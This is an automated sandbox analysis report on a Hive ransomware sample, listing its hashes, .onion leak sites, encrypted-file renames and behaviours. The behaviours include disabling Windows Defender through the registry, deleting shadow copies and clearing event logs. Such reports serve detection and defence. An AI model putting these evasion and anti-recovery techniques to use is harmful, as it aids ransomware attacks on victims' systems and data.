Analysis
-
max time kernel
163s -
max time network
126s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
12-01-2022 19:26
Static task
static1
Behavioral task
behavioral1
Sample
5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe
Resource
win7-en-20211208
General
-
Target
5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe
-
Size
3.1MB
-
MD5
f5d7efaec3c1274b0aaa704a6caa1671
-
SHA1
ec5c25e1cee1dca5c75baf5a6e3bec69441959dc
-
SHA256
5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d
-
SHA512
dab0a8060e9012706ae6ba46adeb2f18e5edecdc187e856989236dd0edb46ed7912cee97cee1c9fb075724c5d736b07e418991d1a3793bee6770d51618dd607f
Malware Config
Extracted
C:\Program Files\7-Zip\GyDM_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1304 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies extensions of user files 20 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exedescription ioc process File renamed C:\Users\Admin\Pictures\BackupResolve.png => C:\Users\Admin\Pictures\BackupResolve.png.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_y2N5f24_dPY0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File renamed C:\Users\Admin\Pictures\InstallConvertTo.raw => C:\Users\Admin\Pictures\InstallConvertTo.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_7hzro7Q_Jgc0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Users\Admin\Pictures\JoinDeny.crw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_fHsSQzf8TFE0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File renamed C:\Users\Admin\Pictures\PushRemove.tiff => C:\Users\Admin\Pictures\PushRemove.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_LVhpq22wIcI0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File renamed C:\Users\Admin\Pictures\WatchSet.tiff => C:\Users\Admin\Pictures\WatchSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_e9ChL9xkWJw0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Users\Admin\Pictures\WatchSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_e9ChL9xkWJw0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File renamed C:\Users\Admin\Pictures\JoinDeny.crw => C:\Users\Admin\Pictures\JoinDeny.crw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_fHsSQzf8TFE0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Users\Admin\Pictures\MeasureStep.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_AvZhcYsoiGc0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File renamed C:\Users\Admin\Pictures\ResolveExit.tiff => C:\Users\Admin\Pictures\ResolveExit.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_kUGuFCNodDQ0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Users\Admin\Pictures\ResolveExit.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_kUGuFCNodDQ0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Users\Admin\Pictures\UnlockCheckpoint.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_oiyuzWfHDQ00.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Users\Admin\Pictures\CompleteRestart.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xHtzVD_jhqw0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File renamed C:\Users\Admin\Pictures\MeasureStep.raw => C:\Users\Admin\Pictures\MeasureStep.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_AvZhcYsoiGc0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Users\Admin\Pictures\PushRemove.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_LVhpq22wIcI0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File renamed C:\Users\Admin\Pictures\UnlockCheckpoint.tiff => C:\Users\Admin\Pictures\UnlockCheckpoint.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_oiyuzWfHDQ00.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Users\Admin\Pictures\StopSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_aRZbXqUHaHk0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Users\Admin\Pictures\BackupResolve.png.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_y2N5f24_dPY0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File renamed C:\Users\Admin\Pictures\CompleteRestart.tiff => C:\Users\Admin\Pictures\CompleteRestart.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xHtzVD_jhqw0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Users\Admin\Pictures\InstallConvertTo.raw.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_7hzro7Q_Jgc0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File renamed C:\Users\Admin\Pictures\StopSet.tiff => C:\Users\Admin\Pictures\StopSet.tiff.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_aRZbXqUHaHk0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exedescription ioc process File opened for modification C:\Program Files\7-Zip\7z.sfx.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_6U2TucaWhHQ0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_sv.properties.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_xH0qJspj4Fo0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\rt.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_slAnsTm2zaY0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_IE19xpdflrg0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsViewAttachmentIcons.jpg.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_KvGxR9Ny_tE0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\SKY.INF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_50S4_2GKpi40.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02743G.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_ietfb4yDpf40.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10265_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_qPenILcwkEc0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\SUBMIT.JS.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8r8n7O2vh5I0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\calendar.html 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_Ot4-BRBpVOw0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\VBENDF98.CHM.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_tYNE5h156iE0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01785_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_ejDkUpNb-uE0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Clarity.thmx.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_6Xe4PVKgUZs0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.bmp 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_docked.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\flavormap.properties.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_CKOnfQsRD000.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kabul.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_H8_ysH1OV5c0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_nOawPqpkPdI0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Jayapura.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_HJpgra2PKGw0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tongatapu.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_YZXiE3xprXI0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD09664_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_PoFgODea85Y0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0240695.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_3oHjEzreFvY0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0336075.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_DD1FktKFpq40.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_JGFJtpgVJ8Q0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\gadget.xml 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382961.JPG.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_tDatXFn3nMs0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00608_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_wVoQVlsauuA0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\base-undocked-3.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\GyDM_HOW_TO_DECRYPT.txt 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcer.dll.mui 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115865.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8RTeLd2R-f40.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Windows Media Player\fr-FR\wmpnetwk.exe.mui 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099181.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_quaHYc52ueQ0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left_disable.gif.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_14QF-F3brxE0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\drag.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\GyDM_HOW_TO_DECRYPT.txt 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02446_.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_JGoscHH3fdE0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL044.XML.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_Ajgo8utBdCc0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_MOlglUL-oY40.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)notConnectedStateIcon.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msdaprsr.dll.mui 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0090777.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_MwbOO68tbHo0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\de-DE\Solitaire.exe.mui.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_SYlWSGO4sU00.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239953.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_8DKzi95OH_Y0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02074U.BMP.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_2TyluNyOAXs0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR5F.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_E3nas5TA5u80.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\20.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\GyDM_HOW_TO_DECRYPT.txt 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_4IrIjFVxFd80.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099205.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_NrLVH77nBoc0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105230.WMF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_lmfOb2-shGk0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14844_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_dwiuYnFxHdY0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21340_.GIF.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_l3ZfTuzQV9k0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\button-overlay.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_dChs6bXxbhw0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02071U.BMP.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_9v9J0tGUQx00.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_UUamuYI-GU80.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\js\calendar.js 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar.T92qieoA6pLwMK6BBkQqzsDzvbzgWNkqplrqzOjy5vr_1dQCooE08es0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1892 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exe5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exepid process 1340 powershell.exe 1352 powershell.exe 1620 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1904 wevtutil.exe Token: SeBackupPrivilege 1904 wevtutil.exe Token: SeSecurityPrivilege 756 wevtutil.exe Token: SeBackupPrivilege 756 wevtutil.exe Token: SeSecurityPrivilege 1940 wevtutil.exe Token: SeBackupPrivilege 1940 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1516 wmic.exe Token: SeSecurityPrivilege 1516 wmic.exe Token: SeTakeOwnershipPrivilege 1516 wmic.exe Token: SeLoadDriverPrivilege 1516 wmic.exe Token: SeSystemProfilePrivilege 1516 wmic.exe Token: SeSystemtimePrivilege 1516 wmic.exe Token: SeProfSingleProcessPrivilege 1516 wmic.exe Token: SeIncBasePriorityPrivilege 1516 wmic.exe Token: SeCreatePagefilePrivilege 1516 wmic.exe Token: SeBackupPrivilege 1516 wmic.exe Token: SeRestorePrivilege 1516 wmic.exe Token: SeShutdownPrivilege 1516 wmic.exe Token: SeDebugPrivilege 1516 wmic.exe Token: SeSystemEnvironmentPrivilege 1516 wmic.exe Token: SeRemoteShutdownPrivilege 1516 wmic.exe Token: SeUndockPrivilege 1516 wmic.exe Token: SeManageVolumePrivilege 1516 wmic.exe Token: 33 1516 wmic.exe Token: 34 1516 wmic.exe Token: 35 1516 wmic.exe Token: SeIncreaseQuotaPrivilege 600 wmic.exe Token: SeSecurityPrivilege 600 wmic.exe Token: SeTakeOwnershipPrivilege 600 wmic.exe Token: SeLoadDriverPrivilege 600 wmic.exe Token: SeSystemProfilePrivilege 600 wmic.exe Token: SeSystemtimePrivilege 600 wmic.exe Token: SeProfSingleProcessPrivilege 600 wmic.exe Token: SeIncBasePriorityPrivilege 600 wmic.exe Token: SeCreatePagefilePrivilege 600 wmic.exe Token: SeBackupPrivilege 600 wmic.exe Token: SeRestorePrivilege 600 wmic.exe Token: SeShutdownPrivilege 600 wmic.exe Token: SeDebugPrivilege 600 wmic.exe Token: SeSystemEnvironmentPrivilege 600 wmic.exe Token: SeRemoteShutdownPrivilege 600 wmic.exe Token: SeUndockPrivilege 600 wmic.exe Token: SeManageVolumePrivilege 600 wmic.exe Token: 33 600 wmic.exe Token: 34 600 wmic.exe Token: 35 600 wmic.exe Token: SeIncreaseQuotaPrivilege 600 wmic.exe Token: SeSecurityPrivilege 600 wmic.exe Token: SeTakeOwnershipPrivilege 600 wmic.exe Token: SeLoadDriverPrivilege 600 wmic.exe Token: SeSystemProfilePrivilege 600 wmic.exe Token: SeSystemtimePrivilege 600 wmic.exe Token: SeProfSingleProcessPrivilege 600 wmic.exe Token: SeIncBasePriorityPrivilege 600 wmic.exe Token: SeCreatePagefilePrivilege 600 wmic.exe Token: SeBackupPrivilege 600 wmic.exe Token: SeRestorePrivilege 600 wmic.exe Token: SeShutdownPrivilege 600 wmic.exe Token: SeDebugPrivilege 600 wmic.exe Token: SeSystemEnvironmentPrivilege 600 wmic.exe Token: SeRemoteShutdownPrivilege 600 wmic.exe Token: SeUndockPrivilege 600 wmic.exe Token: SeManageVolumePrivilege 600 wmic.exe Token: 33 600 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
